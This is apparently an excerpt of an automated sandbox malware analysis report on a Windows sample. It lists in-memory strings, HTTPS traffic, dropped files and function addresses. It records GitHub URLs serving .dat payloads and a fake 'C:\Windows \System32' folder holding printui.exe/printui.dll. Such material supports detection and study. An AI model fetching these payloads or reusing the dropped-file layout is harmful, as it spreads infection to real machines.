Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, svchost.exe, 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp, console_zero.exe, console_zero.exe, 00000020.00000002.1808210205.00007FF70F2D3000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 00000020.00000000.1749217813.00007FF70F2D3000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000002A.00000002.1826480187.00007FF70F2D3000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000002A.00000000.1764823946.00007FF70F2D3000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://dns.google/resolve?name=
Source: svchost.exe, 0000001A.00000002.2847028150.0000013B84463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/uamd.dat
Source: svchost.exe, 0000001A.00000002.2847004878.0000013B8442B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpu.dat
Source: svchost.exe, 0000001A.00000003.2211131614.0000013B844E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2847004878.0000013B8442B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpusys.dat
Source: svchost.exe, 0000001A.00000002.2847004878.0000013B8442B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2847222227.0000013B8448C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.2211131614.0000013B844EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/unv.dat
Source: svchost.exe, 0000001A.00000002.2847427687.0000013B84902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2847222227.0000013B8448C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/un1/uusb.dat
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://ipinfo.io/json
Source: svchost.exe, 0000001A.00000003.2211131614.0000013B844E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.2211131614.0000013B844EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/missingauth
Source: svchost.exe, 0000001A.00000002.2847310661.0000013B844F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/rootunvbot/mydata/refs/heads/main/unvumainrestorehardx.dat
Source: svchost.exe, 0000001A.00000002.2847427687.0000013B84902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/runvd01/dwl/refs/heads/main/u
Source: svchost.exe, 0000001A.00000002.2847427687.0000013B84902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2847330585.0000013B844FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2847222227.0000013B8448C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/runvd01/dwl/refs/heads/main/un1/uusb.dat
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2845803486.00000000660F4000.00000008.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.gnu.org/licenses/
Source: svchost.exeString found in binary or memory: https://www.openssl.org/
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2847985695.00007FFBAA11E000.00000002.00000001.01000000.0000000B.sdmp, svchost.exe, 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.openssl.org/H
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.8:49761 version: TLS 1.2
Source: unknownHTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.8:49779 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49785 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49804 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.8:49814 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.8:49829 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49835 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49853 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.8:49861 version: TLS 1.2
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF62B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,32_2_00007FFBBAF62B80
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB039E50: DeviceIoControl,GetLastError,26_2_00007FFBAB039E50
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB0118D0 WTSGetActiveConsoleSessionId,WTSQueryUserToken,CreateProcessAsUserW,CloseHandle,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn,GetSystemDirectoryW,26_2_00007FFBAB0118D0
Source: C:\Users\user\Desktop\58VSNPxrI4.exeFile created: C:\Windows \System32\printui.exeJump to behavior
Source: C:\Users\user\Desktop\58VSNPxrI4.exeFile created: C:\Windows \System32\printui.dllJump to behavior
Source: C:\Windows\System32\cmd.exeFile created: C:\WindowsJump to behavior
Source: C:\Windows\System32\cmd.exeFile created: C:\Windows \System32Jump to behavior
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\winsvcfJump to behavior
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\winsvcf\winlogsvcJump to behavior
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dllJump to behavior
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dllJump to behavior
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dllJump to behavior
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dllJump to behavior
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dllJump to behavior
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dllJump to behavior
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dllJump to behavior
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exeJump to behavior
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dllJump to behavior
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dllJump to behavior
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dllJump to behavior
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x939048.datJump to behavior
Source: C:\Windows\System32\svchost.exeFile created: c:\windows\system32\winsvcf\x549596.datJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_zu2y31t2.mzr.ps1
Source: C:\Windows \System32\printui.exeCode function: 13_2_00007FF616B110E013_2_00007FF616B110E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6600A23026_2_6600A230
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6601076026_2_66010760
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6600981026_2_66009810
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6600BC9026_2_6600BC90
Source: C:\Windows\System32\svchost.exeCode function: 26_2_660050A026_2_660050A0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_66019CB026_2_66019CB0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6600ACD026_2_6600ACD0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_66004CE026_2_66004CE0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6600DD2026_2_6600DD20
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6600CD6026_2_6600CD60
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6600E58026_2_6600E580
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6600D5A026_2_6600D5A0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_660121B026_2_660121B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6828A0B026_2_6828A0B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6828C22026_2_6828C220
Source: C:\Windows\System32\svchost.exeCode function: 26_2_68281C1026_2_68281C10
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6828350026_2_68283500
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682926C126_2_682926C1
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB0539EC26_2_00007FFBAB0539EC
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB067FFC26_2_00007FFBAB067FFC
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFE6E6026_2_00007FFBAAFE6E60
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFE72F026_2_00007FFBAAFE72F0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFE65F026_2_00007FFBAAFE65F0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB02FC5026_2_00007FFBAB02FC50
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFD5C5026_2_00007FFBAAFD5C50
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB008C8026_2_00007FFBAB008C80
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB02EAB026_2_00007FFBAB02EAB0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB067AA426_2_00007FFBAB067AA4
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB04AAC426_2_00007FFBAB04AAC4
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFF4AE026_2_00007FFBAAFF4AE0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFC9B2026_2_00007FFBAAFC9B20
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFF99B026_2_00007FFBAAFF99B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB05A9E026_2_00007FFBAB05A9E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB0099E026_2_00007FFBAB0099E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB039A4026_2_00007FFBAB039A40
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFE0A6026_2_00007FFBAAFE0A60
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFD3A7026_2_00007FFBAAFD3A70
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFCAA7026_2_00007FFBAAFCAA70
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB0118D026_2_00007FFBAB0118D0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFC28C026_2_00007FFBAAFC28C0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB04A8C026_2_00007FFBAB04A8C0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFEF90026_2_00007FFBAAFEF900
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB05795826_2_00007FFBAB057958
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB04B96826_2_00007FFBAB04B968
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB032FB026_2_00007FFBAB032FB0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB02EFA026_2_00007FFBAB02EFA0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB00904026_2_00007FFBAB009040
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB00A08026_2_00007FFBAB00A080
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFF5EA026_2_00007FFBAAFF5EA0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFEDDC026_2_00007FFBAAFEDDC0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB009E1026_2_00007FFBAB009E10
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFF4E2026_2_00007FFBAAFF4E20
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB058D1026_2_00007FFBAB058D10
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB05AD9026_2_00007FFBAB05AD90
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB00A3B026_2_00007FFBAB00A3B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFDB45026_2_00007FFBAAFDB450
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFF445026_2_00007FFBAAFF4450
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFCA2D026_2_00007FFBAAFCA2D0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB00938026_2_00007FFBAB009380
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFF81A026_2_00007FFBAAFF81A0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB0591A826_2_00007FFBAB0591A8
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFF410026_2_00007FFBAAFF4100
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFC315026_2_00007FFBAAFC3150
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFF516026_2_00007FFBAAFF5160
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFF47A026_2_00007FFBAAFF47A0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB05982026_2_00007FFBAB059820
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB04A6BC26_2_00007FFBAB04A6BC
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFC36D026_2_00007FFBAAFC36D0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFD270926_2_00007FFBAAFD2709
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFD173026_2_00007FFBAAFD1730
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB05562C26_2_00007FFBAB05562C
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB04162026_2_00007FFBAB041620
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFD34A026_2_00007FFBAAFD34A0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFDE4F026_2_00007FFBAAFDE4F0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAAFF54F026_2_00007FFBAAFF54F0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB04358026_2_00007FFBAB043580
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB420EB026_2_00007FFBAB420EB0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB468B6026_2_00007FFBAB468B60
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB47CB3026_2_00007FFBAB47CB30
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4969E026_2_00007FFBAB4969E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB43CA9026_2_00007FFBAB43CA90
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB472FA026_2_00007FFBAB472FA0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45EDC026_2_00007FFBAB45EDC0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB474CD026_2_00007FFBAB474CD0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB484CC026_2_00007FFBAB484CC0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB47A2E026_2_00007FFBAB47A2E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4322E026_2_00007FFBAB4322E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45835026_2_00007FFBAB458350
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45C21026_2_00007FFBAB45C210
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB41221026_2_00007FFBAB412210
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB49C28026_2_00007FFBAB49C280
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB44C24026_2_00007FFBAB44C240
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46E0F026_2_00007FFBAB46E0F0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45C70026_2_00007FFBAB45C700
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB47A6B026_2_00007FFBAB47A6B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB42C61026_2_00007FFBAB42C610
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB47E4E026_2_00007FFBAB47E4E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB47059026_2_00007FFBAB470590
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB48055026_2_00007FFBAB480550
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB41FBB026_2_00007FFBAB41FBB0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F29ADD032_2_00007FF70F29ADD0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F28285232_2_00007FF70F282852
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2B887832_2_00007FF70F2B8878
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2968A032_2_00007FF70F2968A0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2880A032_2_00007FF70F2880A0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2750F032_2_00007FF70F2750F0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2BCF3432_2_00007FF70F2BCF34
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F299F2932_2_00007FF70F299F29
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F272F9032_2_00007FF70F272F90
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2C1FD032_2_00007FF70F2C1FD0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2A9FB032_2_00007FF70F2A9FB0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2997F032_2_00007FF70F2997F0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F28DE2032_2_00007FF70F28DE20
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2B662032_2_00007FF70F2B6620
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F29A68A32_2_00007FF70F29A68A
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2B867432_2_00007FF70F2B8674
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2AC66832_2_00007FF70F2AC668
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2876D032_2_00007FF70F2876D0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2826AC32_2_00007FF70F2826AC
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F28A6F032_2_00007FF70F28A6F0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F287D6032_2_00007FF70F287D60
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2B95B832_2_00007FF70F2B95B8
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2CB45432_2_00007FF70F2CB454
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2CCC8432_2_00007FF70F2CCC84
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2C246832_2_00007FF70F2C2468
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F27439032_2_00007FF70F274390
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F28238032_2_00007FF70F282380
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F28738032_2_00007FF70F287380
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2883E032_2_00007FF70F2883E0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F287A2032_2_00007FF70F287A20
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2B8A7C32_2_00007FF70F2B8A7C
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F29A2D032_2_00007FF70F29A2D0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2C2AE032_2_00007FF70F2C2AE0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F285AE032_2_00007FF70F285AE0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F27218032_2_00007FF70F272180
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2C621032_2_00007FF70F2C6210
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F272A1032_2_00007FF70F272A10
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2CD1DC32_2_00007FF70F2CD1DC
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF61C3032_2_00007FFBBAF61C30
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFA6B5032_2_00007FFBBAFA6B50
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFA2B6032_2_00007FFBBAFA2B60
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF62B8032_2_00007FFBBAF62B80
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF749E032_2_00007FFBBAF749E0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF7BA4032_2_00007FFBBAF7BA40
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF8AA5232_2_00007FFBBAF8AA52
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF6EFC032_2_00007FFBBAF6EFC0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF63FE032_2_00007FFBBAF63FE0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFACEC032_2_00007FFBBAFACEC0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF9CDD032_2_00007FFBBAF9CDD0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF9FE3032_2_00007FFBBAF9FE30
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF8BE3032_2_00007FFBBAF8BE30
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF63D5032_2_00007FFBBAF63D50
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFA3D8032_2_00007FFBBAFA3D80
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF9A3A032_2_00007FFBBAF9A3A0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF5F0C032_2_00007FFBBAF5F0C0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFA00D032_2_00007FFBBAFA00D0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF8C7B032_2_00007FFBBAF8C7B0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF816F032_2_00007FFBBAF816F0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFA867032_2_00007FFBBAFA8670
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF8A4A432_2_00007FFBBAF8A4A4
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFB04A632_2_00007FFBBAFB04A6
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF8B4E032_2_00007FFBBAF8B4E0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFA74F032_2_00007FFBBAFA74F0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF8F50032_2_00007FFBBAF8F500
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB4483C0 appears 46 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB448330 appears 44 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB49EDF0 appears 422 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAAFC3E40 appears 90 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB49E10A appears 32 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB49E104 appears 229 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB49E896 appears 138 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB458FD0 appears 52 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB49E0FE appears 34 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB49E1CA appears 640 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB49E8A2 appears 106 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF70F273700 appears 88 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAF84EB0 appears 39 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAF9E2A0 appears 83 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAF64D20 appears 44 times
